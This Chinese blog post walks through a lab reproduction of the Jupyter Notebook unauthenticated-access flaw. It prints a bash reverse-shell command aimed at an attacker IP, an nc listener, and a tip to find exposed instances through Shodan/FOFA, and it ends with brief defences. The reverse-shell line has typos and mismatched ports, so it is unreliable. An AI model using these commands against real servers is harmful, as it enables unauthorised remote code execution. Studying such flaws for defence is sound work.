热门标签
热门文章
- 1RabbitMQ docker安装
- 2不输ChatGPT!盘点国产功能强大且免费的大语言模型Top6!_路线1路线2路线3国产_国产大语言模型
- 3Android 无线调试 adb connect ip:port 失败
- 4Flink CDC系列之:基于 Flink CDC 构建 MySQL 和 Postgres 的 Streaming ETL_flink mysql建表
- 5android 调用其他函数调用吗,android – 如何在另一个活动中调用方法
- 6Mac下java环境搭建_mac安装jdk
- 7IDEA技巧-快速编写一个String类型的JSON对象_idea中json怎么写
- 8无人机侦察:无人机雷达探测设备技术详解_雷达探测无人机系统的应用
- 9玩机进阶教程----MTK芯片读写分区 备份分区 恢复分区 制作线刷包 从0开始 工具操作解析【三】_mtkclient 分区修改
- 10GPT大模型不再遥不可及:本地化部署让每个人都能拥有_本地gpt模型
当前位置: article > 正文
漏洞复现----25、Jupyter Notebook 未授权访问漏洞_jupyter漏洞
作者:煮酒与君饮 | 2024-08-06 03:46:17
赞
踩
jupyter漏洞
Jupyter Notebook 未授权访问漏洞
Jupyter Notebook(此前被称为 IPython notebook)是基于网页的用于交互计算的应用程序,是一个交互式笔记本,支持运行 40 多种编程语言。Jupyter Notebook是以网页的形式打开,可以在网页页面中直接编写代码和运行代码,代码的运行结果也会直接在代码块下显示。
如果管理员未为Jupyter Notebook配置密码,将导致未授权访问漏洞,游客可在其中创建一个console并执行任意Python代码和命令。
一、运行环境
docker-compose up -d
访问:ip:8888
- 1
- 2
二、漏洞复现
在shadan和FOFA等网络空间搜索引擎中搜索,可发现大量使用Jupyter Notebook的系统。
1、直接访问http://192.168.209.138:8888,并没有进行身份校验,未授权可以直接访问。
2、利用Terminal可以直接执行系统命令
3、
在命令行执行:bahs -i > &/dev/tcp/192.168.209.128/44444 0>&1。
监听机器执行:nc -lvvp 4444
- 1
- 2
三、漏洞防御
1、开启身份验证, 防止止未经授权用用户访问
2、访问控制策略略, 限制IP访问, 绑定固定IP
推荐阅读
相关标签
